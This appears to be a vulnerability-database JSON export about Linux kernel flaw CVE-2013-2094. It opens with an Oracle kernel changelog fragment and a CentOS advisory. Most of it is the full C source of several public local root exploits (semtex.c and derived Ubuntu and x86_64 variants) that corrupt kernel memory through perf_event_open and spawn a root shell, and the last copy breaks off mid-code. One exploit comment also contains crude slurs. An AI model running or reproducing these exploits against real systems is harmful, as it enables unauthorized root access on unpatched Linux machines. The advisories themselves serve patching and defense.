Fix displaying the FW Version from driver. (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix support for DEFQ extension (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix MACRO for checking the adapter type (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix freeing CXN specific driver resources. (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix MSIx support in SKH-R to 32 (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix MBX Command issues (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix when MBX fails with Insufficient buffer error (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Send uninitialize pattern to FW (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Get Port State and Speed of the Adapter (John Soni Jose) [Orabug: 16704553] \r\n- hpwdt: Only BYTE reads/writes to WD Timer port 0x72 (Mingarelli, Thomas) \r\n- misc: hpilo: ignore auxiliary HP iLO BMCs (Mark Rusk) \r\n- MISC: hpilo, remove pci_disable_device (Jiri Slaby) \r\n- misc: hpilo: increase number of max supported channels (Camuso, Tony) \r\n- Fix device removal NULL pointer dereference (Joe Jin) [Orabug: 16684527] \r\n- put stricter guards on queue dead checks (James Bottomley) [Orabug: 16684527] \r\n- RDS: Fixes race conditions that may lead to non-optimal paths, causing lower throughput (Bang Nguyen) [Orabug: 16571410] \r\n- 8139cp: Prevent dev_close/cp_interrupt race on MTU change (John Greene) \r\n- 8139cp: properly support change of MTU values [v2] (John Greene) \r\n- 8139cp: fix coherent mapping leak in error path. (francois romieu) \r\n- 8139cp: re-enable interrupts after tx timeout (David Woodhouse) \r\n- 8139cp: set ring address after enabling C+ mode (David Woodhouse) \r\n- 8139cp: revert 'set ring address before enabling receiver' (francois romieu) \r\n- sched: Use resched IPI to kick off the nohz idle balance (Suresh Siddha) [Orabug: 16424589] \r\n- llc: fix info leak via getsockname() (Mathias Krause) [Orabug: 16675488] {CVE-2012-6542} \r\n- qla4xxx: update driver version to v5.03.00.02.06.02-uek2 (Tej Parkash) \r\n- qla4xxx: Silence the compile warning for uint comparison (Adheer Chandravanshi) \r\n- qla4xxx: changing default behaviour of ql4xdisablesysfsboot to true (Tej Parkash) \r\n- qla4xxx: Silence gcc warning for uninitialized veriable (Vikas Chaudhary) \r\n- qla4xxx: Added print statements to display AENs (Vikas Chaudhary) \r\n- qla4xxx: Use correct value for max flash node entries (Adheer Chandravanshi) \r\n- qla4xxx: Restrict logout from boot target session using session id (Adheer Chandravanshi) \r\n- qla4xxx: Use correct flash ddb offset for ISP40XX (Adheer Chandravanshi) \r\n- qla4xxx: Replace dev type macros with generic portal type macros (Adheer Chandravanshi) \r\n- scsi_transport_iscsi: Declare portal type string macros for generic use (Adheer Chandravanshi) \r\n- qla4xxx: Add flash node mgmt support (Adheer Chandravanshi) \r\n- libiscsi: export function iscsi_switch_str_param (Adheer Chandravanshi) \r\n- scsi_transport_iscsi: Add flash node mgmt support (Adheer Chandravanshi) \r\n- qla4xxx: Skip retry of initialize_adapter only for ISP8XXX (Nilesh Javali) \r\n- qla4xxx: Assign correct CHAP table address to FLT (Vikas Chaudhary) \r\n- qla4xxx: Added missing check for ISP83XX in CHAP related functions (Vikas Chaudhary) \r\n- qla4xxx: dont free NULL dma pool (Dan Carpenter) \r\n- qla4xxx: Fixed request queue count manipulation on response path (Tej Parkash) \r\n- qla4xxx: Fix debug level to avoid floods of same message (Vikas Chaudhary) \r\n- qla4xxx: Pass correct LUN address to firmware in case of lun_reset (Vikas Chaudhary) \r\n- qla4xxx: Fix double reset in case of firmware hung for ISP83XX (Vikas Chaudhary) \r\n- qla4xxx: Set graceful reset bit for ISP83XX (Vikas Chaudhary) \r\n- qla4xxx: Boot from SAN fix for ISP83XX (Vikas Chaudhary) \r\n- qla4xxx: Take E-port out of reset before disabling pause frames (Manish Dusane) \r\n- qla4xxx: Fix return code for qla4xxx_session_get_param. (Manish Rangankar) \r\n- qla4xxx: wait for boot target login response during probe (Manish Rangankar) \r\n- qla4xxx: Added support for force firmware dump (Vikas Chaudhary) \r\n- qla4xxx: Re-register IRQ handler while retrying initialize of adapter (Poornima Vonti) \r\n- qla4xxx: Throttle active IOCBs to firmware limits (Karen Higgins) \r\n- qla4xxx: Remove unnecessary code from qla4xxx_init_local_data (Karen Higgins) \r\n- qla4xxx: Quiesce driver activities while loopback (Nilesh Javali) \r\n- qla4xxx: Rename MBOX_ASTS_IDC_NOTIFY to MBOX_ASTS_IDC_REQUEST_NOTIFICATION (Nilesh Javali) \r\n- qla4xxx: Add spurious interrupt messages under debug level 2 (Nilesh Javali) \r\n- scsi_transport_iscsi: export iscsi class sessions target_id in sysfs. (Manish Rangankar) \r\n- r8169: fix auto speed down issue (hayeswang) \r\n- r8169: honor jumbo settings when chipset is requested to start. (francois romieu) \r\n- Revert 'r8169: enable internal ASPM and clock request settings'. (Francois Romieu) \r\n- Revert 'r8169: enable ALDPS for power saving'. (Francois Romieu) \r\n- r8169: fix vlan tag read ordering. (francois romieu) \r\n- r8169: remove the obsolete and incorrect AMD workaround (Timo Teras) \r\n- r8169: remove unneeded dirty_rx index (Timo Teras) \r\n- remove init of dev->perm_addr in drivers (Jiri Pirko) \r\n- r8169: workaround for missing extended GigaMAC registers (francois romieu) \r\n- r8169: remove __dev* attributes (Bill Pemberton) \r\n- r8169: Drop tp arg from rtl8169_tx_vlan_tag() (Kirill Smelkov) \r\n- r8169: remove unused macros. (Dayanidhi Sreenivasan) \r\n- r8169: enable internal ASPM and clock request settings (hayeswang) \r\n- r8169: allow multicast packets on sub-8168f chipset. (Nathan Walp) \r\n- r8169: Fix WoL on RTL8168d/8111d. (Cyril Brulebois) \r\n- r8169: Kill SafeMtu macro (Kirill Smelkov) \r\n- r8169: enable ALDPS for power saving (hayeswang) \r\n- hpsa: check for dma_mapping_error in hpsa_passthru ioctls (Stephen M. Cameron) \r\n- hpsa: reorganize error handling in hpsa_passthru_ioctl (Stephen M. Cameron) \r\n- hpsa: check for dma_mapping_error in hpsa_map_sg_chain_block (Stephen M. Cameron) \r\n- hpsa: Check for dma_mapping_error for all code paths using fill_cmd (Stephen M. Cameron) \r\n- hpsa: Check for dma_mapping_error in hpsa_map_one (Shuah Khan) \r\n- Drivers: scsi: remove __dev* attributes. (Greg Kroah-Hartman) \r\n- hpsa: removed unused member maxQsinceinit (Stephen M. Cameron) \r\n- hpsa: use check_signature (Akinobu Mita) \r\n- iser: panic on iser connect (Shamir Rabinovitch) [Orabug: 16313854] \r\n- Btrfs: fix backport conflicts (Liu Bo) \r\n- Revert 'Btrfs: using for_each_set_bit_from to simplify the code' (Liu Bo) \r\n- Revert 'Btrfs: move the sb_end_intwrite until after the throttle logic' (Liu Bo) \r\n- Revert 'btrfs: Convert to new freezing mechanism' (Liu Bo) \r\n- Revert 'Btrfs: add qgroup inheritance' (Liu Bo) \r\n- Revert 'Btrfs: call the qgroup acco", "edition": 72, "modified": "2013-06-12T00:00:00", "published": "2013-06-12T00:00:00", "id": "ELSA-2013-2525", "href": "http://linux.oracle.com/errata/ELSA-2013-2525.html", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:28:03", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0830\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. (CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. The system must be rebooted for this update to\ntake effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-May/031771.html\n\n**Affected packages:**\nkernel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0830.html", "edition": 3, "modified": "2013-05-17T00:36:04", "published": "2013-05-17T00:36:04", "href": "http://lists.centos.org/pipermail/centos-announce/2013-May/031771.html", "id": "CESA-2013:0830", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T01:23:03", "description": "Linux Kernel 2.6.37 <= 3.x.x - PERF_EVENTS Local Root Exploit. CVE-2013-2094. Local exploit for linux platform", "published": "2013-05-14T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.37 <= 3.x.x - PERF_EVENTS Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-14T00:00:00", "id": "EDB-ID:25444", "href": "https://www.exploit-db.com/exploits/25444/", "sourceData": "/*\r\n * linux 2.6.37-3.x.x x86_64, ~100 LOC\r\n * gcc-4.6 -O2 semtex.c && ./a.out\r\n * 2010 sd@fucksheep.org, salut!\r\n *\r\n * update may 2013:\r\n * seems like centos 2.6.32 backported the perf bug, lol.\r\n * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.\r\n */\r\n\r\n#define _GNU_SOURCE 1\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <syscall.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n\r\n#define BASE 0x380000000\r\n#define SIZE 0x010000000\r\n#define KSIZE 0x2000000\r\n#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))\r\n\r\nvoid fuck() {\r\n int i,j,k;\r\n uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };\r\n uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));\r\n uint64_t kbase = ((uint64_t)current)>>36;\r\n uint32_t *fixptr = (void*) AB(1);\r\n *fixptr = -1;\r\n\r\n for (i=0; i<4000; i+=4) {\r\n uint64_t *p = (void *)¤t[i];\r\n uint32_t *t = (void*) p[0];\r\n if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;\r\n for (j=0; j<20; j++) { for (k = 0; k < 8; k++)\r\n if (((uint32_t*)uids)[k] != t[j+k]) goto next;\r\n for (i = 0; i < 8; i++) t[j+i] = 0;\r\n for (i = 0; i < 10; i++) t[j+9+i] = -1;\r\n return;\r\nnext:; }\r\n }\r\n}\r\n\r\nvoid sheep(uint32_t off) {\r\n uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };\r\n int fd = syscall(298, buf, 0, -1, -1, 0);\r\n assert(!close(fd));\r\n}\r\n\r\n\r\nint main() {\r\n uint64_t u,g,needle, kbase, *p; uint8_t *code;\r\n uint32_t *map, j = 5;\r\n int i;\r\n struct {\r\n uint16_t limit;\r\n uint64_t addr;\r\n } __attribute__((packed)) idt;\r\n assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);\r\n memset(map, 0, SIZE);\r\n sheep(-1); sheep(-2);\r\n for (i = 0; i < SIZE/4; i++) if (map[i]) {\r\n assert(map[i+1]);\r\n break;\r\n }\r\n assert(i<SIZE/4);\r\n asm (\"sidt %0\" : \"=m\" (idt));\r\n kbase = idt.addr & 0xff000000;\r\n u = getuid(); g = getgid();\r\n assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);\r\n memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);\r\n memcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\",\r\n printf(\"2.6.37-3.x x86_64\\nsd@fucksheep.org 2010\\n\") % 27);\r\n setresuid(u,u,u); setresgid(g,g,g);\r\n while (j--) {\r\n needle = AB(j+1);\r\n assert(p = memmem(code, 1024, &needle, 8));\r\n if (!p) continue;\r\n *p = j?((g<<32)|u):(idt.addr + 0x48);\r\n }\r\n sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);\r\n asm(\"int $0x4\"); assert(!setuid(0));\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25444/"}, {"lastseen": "2016-02-03T19:30:04", "description": "Ubuntu 12.04.0-2LTS x64 - perf_swevent_init Kernel Local Root Exploit. CVE-2013-2094. Local exploit for linux platform", "published": "2014-05-31T00:00:00", "type": "exploitdb", "title": "Ubuntu 12.04.0-2LTS x64 - perf_swevent_init Kernel Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2014-05-31T00:00:00", "id": "EDB-ID:33589", "href": "https://www.exploit-db.com/exploits/33589/", "sourceData": "/**\r\n * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit\r\n * by Vitaly Nikolenko (vnik5287@gmail.com)\r\n * \r\n * based on semtex.c by sd\r\n *\r\n * Supported targets:\r\n * [0] Ubuntu 12.04.0 - 3.2.0-23-generic\r\n * [1] Ubuntu 12.04.1 - 3.2.0-29-generic\r\n * [2] Ubuntu 12.04.2 - 3.5.0-23-generic\r\n *\r\n * $ gcc vnik.c -O2 -o vnik\r\n *\r\n * $ uname -r\r\n * 3.2.0-23-generic\r\n *\r\n * $ ./vnik 0\r\n */\r\n \r\n#define _GNU_SOURCE 1\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <syscall.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n \r\n#define BASE 0x1780000000\r\n#define SIZE 0x0010000000\r\n#define KSIZE 0x2000000\r\n#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))\r\n \r\ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);\r\n\r\nuint64_t targets[3][3] =\r\n {{0xffffffff81ef67e0, // perf_swevent_enabled\r\n 0xffffffff81091630, // commit_creds\r\n 0xffffffff810918e0}, // prepare_kernel_cred\r\n {0xffffffff81ef67a0,\r\n 0xffffffff81091220,\r\n 0xffffffff810914d0},\r\n {0xffffffff81ef5940,\r\n 0xffffffff8107ee30,\r\n 0xffffffff8107f0c0}\r\n\t };\r\n\r\nvoid __attribute__((regparm(3))) payload() {\r\n\tuint32_t *fixptr = (void*)AB(1);\r\n\t// restore the handler\r\n\t*fixptr = -1;\r\n\tcommit_creds_fn commit_creds = (commit_creds_fn)AB(2);\r\n\tprepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3);\r\n\tcommit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n}\r\n \r\nvoid trigger(uint32_t off) {\r\n\tuint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 };\r\n\tint fd = syscall(298, buf, 0, -1, -1, 0);\r\n\tassert( !close(fd) );\r\n}\r\n \r\nint main(int argc, char **argv) {\r\n\tuint64_t off64, needle, kbase, *p;\r\n\tuint8_t *code;\r\n\tuint32_t int_n, j = 5, target = 1337;\r\n\tint offset = 0;\r\n\tvoid *map;\r\n\r\n\tassert(argc == 2 && \"target?\");\r\n\tassert( (target = atoi(argv[1])) < 3 );\r\n\r\n\tstruct {\r\n\t\tuint16_t limit;\r\n\t\tuint64_t addr;\r\n\t} __attribute__((packed)) idt;\r\n\r\n\t// mmap user-space block so we don't page fault\r\n\t// on sw_perf_event_destroy\r\n\tassert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);\r\n\tmemset(map, 0, SIZE);\r\n\r\n\tasm volatile(\"sidt %0\" : \"=m\" (idt));\r\n\tkbase = idt.addr & 0xff000000;\r\n\tprintf(\"IDT addr = 0x%lx\\n\", idt.addr);\r\n\r\n\tassert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);\r\n\tmemset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024);\r\n\tmemcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\", 13);\r\n\r\n\t// can only play with interrupts 3, 4 and 0x80\r\n\tfor (int_n = 3; int_n <= 0x80; int_n++) {\r\n\t\tfor (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) {\r\n\t\t\tint off32 = off64;\r\n\t\r\n\t\t\tif ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) {\r\n\t\t\t\toffset = off32;\r\n\t\t\t\tgoto out;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (int_n == 4) {\r\n\t\t\t// shit, let's try 0x80 if the kernel is compiled with\r\n\t\t\t// CONFIG_IA32_EMULATION\r\n\t\t\tint_n = 0x80 - 1;\r\n\t\t}\r\n\t}\r\nout:\r\n\tassert(offset);\r\n\tprintf(\"Using int = %d with offset = %d\\n\", int_n, offset);\r\n\r\n\tfor (j = 0; j < 3; j++) {\r\n\t\tneedle = AB(j+1);\r\n\t\tassert(p = memmem(code, 1024, &needle, 8));\r\n\t\t*p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j];\r\n\t}\r\n\ttrigger(offset);\r\n\tswitch (int_n) {\r\n\tcase 3:\r\n\t\tasm volatile(\"int $0x03\");\r\n\t\tbreak;\r\n\tcase 4:\r\n\t\tasm volatile(\"int $0x04\");\r\n\t\tbreak;\r\n\tcase 0x80:\r\n\t\tasm volatile(\"int $0x80\");\r\n\t}\r\n\r\n\tassert(!setuid(0));\r\n\treturn execl(\"/bin/bash\", \"-sh\", NULL);\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33589/"}, {"lastseen": "2016-02-03T02:54:54", "description": "Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit. CVE-2013-2094. Local exploit for linux platform", "published": "2013-06-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-06-11T00:00:00", "id": "EDB-ID:26131", "href": "https://www.exploit-db.com/exploits/26131/", "sourceData": "/*\r\n * CVE-2013-2094 exploit x86_64 Linux < 3.8.9\r\n * by sorbo (sorbo@darkircop.org) June 2013\r\n *\r\n * Based on sd's exploit. Supports more targets.\r\n *\r\n */\r\n\r\n#define _GNU_SOURCE\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <sys/syscall.h>\r\n#include <sys/mman.h>\r\n#include <linux/perf_event.h>\r\n#include <signal.h>\r\n#include <assert.h>\r\n\r\n#define BASE\t\t0x380000000\r\n#define BASE_JUMP\t0x1780000000\r\n#define SIZE \t\t0x10000000\r\n#define KSIZE\t\t0x2000000\r\n\r\n#define TMP(x) (0xdeadbeef + (x))\r\n\r\nstruct idt {\r\n\tuint16_t limit;\r\n\tuint64_t addr;\r\n} __attribute__((packed));\r\n\r\nstatic int _fd;\r\n\r\nstatic int perf_open(uint64_t off)\r\n{\r\n\tstruct perf_event_attr attr;\r\n\tint rc;\r\n\r\n//\tprintf(\"perf open %lx [%d]\\n\", off, (int) off);\r\n\r\n\tmemset(&attr, 0, sizeof(attr));\r\n\r\n\tattr.type \t = PERF_TYPE_SOFTWARE;\r\n\tattr.size \t = sizeof(attr);\r\n\tattr.config \t = off;\r\n\tattr.mmap \t = 1;\r\n\tattr.comm \t = 1;\r\n\tattr.exclude_kernel = 1;\r\n\r\n\trc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);\r\n\r\n\treturn rc;\r\n}\r\n\r\nvoid __sc_start(void);\r\nvoid __sc_next(void);\r\n\r\nvoid __sc(void)\r\n{\r\n\tasm(\"__sc_start:\\n\"\r\n\t \"call __sc_next\\n\"\r\n\t \"iretq\\n\"\r\n\t \"__sc_next:\\n\");\r\n}\r\n\r\nvoid sc(void)\r\n{\r\n\tint i, j;\r\n\tuint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));\r\n\tuint64_t kbase = ((uint64_t)current) >> 36;\r\n\tint uid = TMP(1);\r\n\tint gid = TMP(2);\r\n\r\n\tfor (i = 0; i < 4000; i += 4) {\r\n\t\tuint64_t *p = (void *) ¤t[i];\r\n\t\tuint32_t *cred = (uint32_t*) p[0];\r\n\r\n\t\tif ((p[0] != p[1]) || ((p[0]>>36) != kbase))\r\n\t\t\tcontinue;\r\n\r\n\t\tfor (j = 0; j < 20; j++) {\r\n\t\t\tif (cred[j] == uid && cred[j + 1] == gid) {\r\n\t\t\t\tfor (i = 0; i < 8; i++) {\r\n\t\t\t\t\tcred[j + i] = 0;\r\n\t\t\t\t\treturn;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)\r\n{\r\n\tvoid *p;\r\n\r\n\tp = memmem(sc, 900, &needle, sizeof(needle));\r\n\tif (!p)\r\n\t\terrx(1, \"can't find %x\", needle);\r\n\r\n\tmemcpy(p, &val, sizeof(val));\r\n}\r\n\r\nstatic void *map_mem(uint64_t addr)\r\n{\r\n\tvoid *p;\r\n\r\n\tp = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,\r\n\t\t MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);\r\n\r\n\tif (p == MAP_FAILED)\r\n\t\terr(1, \"mmap()\");\r\n\r\n\treturn p;\r\n}\r\n\r\nstatic int find_mem(void *mem, uint8_t c)\r\n{\r\n\tint i;\r\n\tuint8_t *p = mem;\r\n\r\n\tfor (i = 0; i < SIZE; i++) {\r\n\t\tif (p[i] == c)\r\n\t\t\treturn i;\r\n\t}\r\n\r\n\treturn -1;\r\n}\r\n\r\nstatic void dropshell()\r\n{\r\n\tif (setuid(0) != 0)\r\n\t\terrx(1, \"failed\");\r\n\r\n\tprintf(\"Launching shell\\n\");\r\n\r\n\texecl(\"/bin/sh\", \"sh\", NULL);\r\n\texit(0);\r\n}\r\n\r\nvoid morte(int x)\r\n{\r\n\tprintf(\"Got signal\\n\");\r\n\tclose(_fd);\r\n\tdropshell();\r\n}\r\n\r\nstatic void trigger(int intr)\r\n{\r\n\tswitch (intr) {\r\n\tcase 0:\r\n\t\tdo {\r\n\t\t\tint z = 1;\r\n\t\t\tint a = 1;\r\n\r\n\t\t\tz--;\r\n\r\n\t\t\ta /= z;\r\n\t\t} while (0);\r\n\t\tbreak;\r\n\r\n\tcase 4:\r\n\t\tasm(\"int $4\");\r\n\t\tbreak;\r\n\r\n\tcase 0x80:\r\n\t\tasm(\"int $0x80\");\r\n\t\tbreak;\r\n\r\n\tdefault:\r\n\t\terrx(1, \"unknown intr %d\", intr);\r\n\t}\r\n\r\n\tsleep(3);\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tuint32_t *p[2];\r\n\tint fd, i;\r\n\tuint64_t off;\r\n\tuint64_t addr = BASE;\r\n\tstruct idt idt;\r\n\tuint8_t *kbase;\r\n\tint sz = 4;\r\n\tint intr = 4;\r\n\r\n\tprintf(\"Searchin...\\n\");\r\n\r\n\tp[0] = map_mem(BASE);\r\n\tp[1] = map_mem(BASE_JUMP);\r\n\r\n\tmemset(p[1], 0x69, SIZE);\r\n\r\n\toff = 0xFFFFFFFFL;\r\n\tfd = perf_open(off);\r\n\tclose(fd);\r\n\r\n\ti = find_mem(p[0], 0xff);\r\n\tif (i == -1) {\r\n\t\ti = find_mem(p[1], 0x68);\r\n\r\n\t\tif (i == -1)\r\n\t\t\terrx(1, \"Can't find overwrite\");\r\n\r\n\t\tsz = 24;\r\n\t\taddr = BASE_JUMP;\r\n\t\tprintf(\"detected CONFIG_JUMP_LABEL\\n\");\r\n\t}\r\n\r\n\tmunmap(p[0], SIZE);\r\n\tmunmap(p[1], SIZE);\r\n\r\n\taddr += i;\r\n\taddr -= off * sz;\r\n\r\n\tprintf(\"perf_swevent_enabled is at 0x%lx\\n\", addr);\r\n\r\n\tasm(\"sidt %0\" : \"=m\" (idt));\r\n\r\n\tprintf(\"IDT at 0x%lx\\n\", idt.addr);\r\n\r\n\toff = addr - idt.addr;\r\n\toff -= 8;\r\n\r\n\tswitch (off % sz) {\r\n\tcase 0:\r\n\t\tintr = 0;\r\n\t\tbreak;\r\n\r\n\tcase 8:\r\n\t\tintr = 0x80;\r\n\t\tbreak;\r\n\r\n\tcase 16:\r\n\t\tintr = 4;\r\n\t\tbreak;\r\n\r\n\tdefault:\r\n\t\terrx(1, \"remainder %d\", off % sz);\r\n\t}\r\n\r\n\tprintf(\"Using interrupt %d\\n\", intr);\r\n\r\n\toff -= 16 * intr;\r\n\r\n\tassert((off % sz) == 0);\r\n\r\n\toff /= sz;\r\n\toff = -off;\r\n\r\n//\tprintf(\"Offset %lx\\n\", off);\r\n\r\n\tkbase = (uint8_t*) (idt.addr & 0xFF000000);\r\n\r\n\tprintf(\"Shellcode at %p\\n\", kbase);\r\n\r\n\tif (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,\r\n\t MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)\r\n\t\terr(1, \"mmap()\");\r\n\r\n\tmemset(kbase, 0x90, KSIZE);\r\n\tkbase += KSIZE - 1024;\r\n\r\n\ti = __sc_next - __sc_start;\r\n\tmemcpy(kbase, __sc_start, i);\r\n\tkbase += i;\r\n\tmemcpy(kbase, sc, 900);\r\n\r\n\tsc_replace(kbase, TMP(1), getuid());\r\n\tsc_replace(kbase, TMP(2), getgid());\r\n\r\n\tsignal(SIGALRM, morte);\r\n\talarm(2);\r\n\r\n\tprintf(\"Triggering sploit\\n\");\r\n\t_fd = perf_open(off);\r\n\r\n\ttrigger(intr);\r\n\r\n\texit(0);\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/26131/"}], "seebug": [{"lastseen": "2017-11-19T15:59:19", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79777", "id": "SSV:79777", "sourceData": "\n /*\r\n * CVE-2013-2094 exploit x86_64 Linux < 3.8.9\r\n * by sorbo (sorbo@darkircop.org) June 2013\r\n *\r\n * Based on sd's exploit. Supports more targets.\r\n *\r\n */\r\n\r\n#define _GNU_SOURCE\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <sys/syscall.h>\r\n#include <sys/mman.h>\r\n#include <linux/perf_event.h>\r\n#include <signal.h>\r\n#include <assert.h>\r\n\r\n#define BASE\t\t0x380000000\r\n#define BASE_JUMP\t0x1780000000\r\n#define SIZE \t\t0x10000000\r\n#define KSIZE\t\t0x2000000\r\n\r\n#define TMP(x) (0xdeadbeef + (x))\r\n\r\nstruct idt {\r\n\tuint16_t limit;\r\n\tuint64_t addr;\r\n} __attribute__((packed));\r\n\r\nstatic int _fd;\r\n\r\nstatic int perf_open(uint64_t off)\r\n{\r\n\tstruct perf_event_attr attr;\r\n\tint rc;\r\n\r\n//\tprintf("perf open %lx [%d]\\n", off, (int) off);\r\n\r\n\tmemset(&attr, 0, sizeof(attr));\r\n\r\n\tattr.type \t = PERF_TYPE_SOFTWARE;\r\n\tattr.size \t = sizeof(attr);\r\n\tattr.config \t = off;\r\n\tattr.mmap \t = 1;\r\n\tattr.comm \t = 1;\r\n\tattr.exclude_kernel = 1;\r\n\r\n\trc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);\r\n\r\n\treturn rc;\r\n}\r\n\r\nvoid __sc_start(void);\r\nvoid __sc_next(void);\r\n\r\nvoid __sc(void)\r\n{\r\n\tasm("__sc_start:\\n"\r\n\t "call __sc_next\\n"\r\n\t "iretq\\n"\r\n\t "__sc_next:\\n");\r\n}\r\n\r\nvoid sc(void)\r\n{\r\n\tint i, j;\r\n\tuint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));\r\n\tuint64_t kbase = ((uint64_t)current) >> 36;\r\n\tint uid = TMP(1);\r\n\tint gid = TMP(2);\r\n\r\n\tfor (i = 0; i < 4000; i += 4) {\r\n\t\tuint64_t *p = (void *) ¤t[i];\r\n\t\tuint32_t 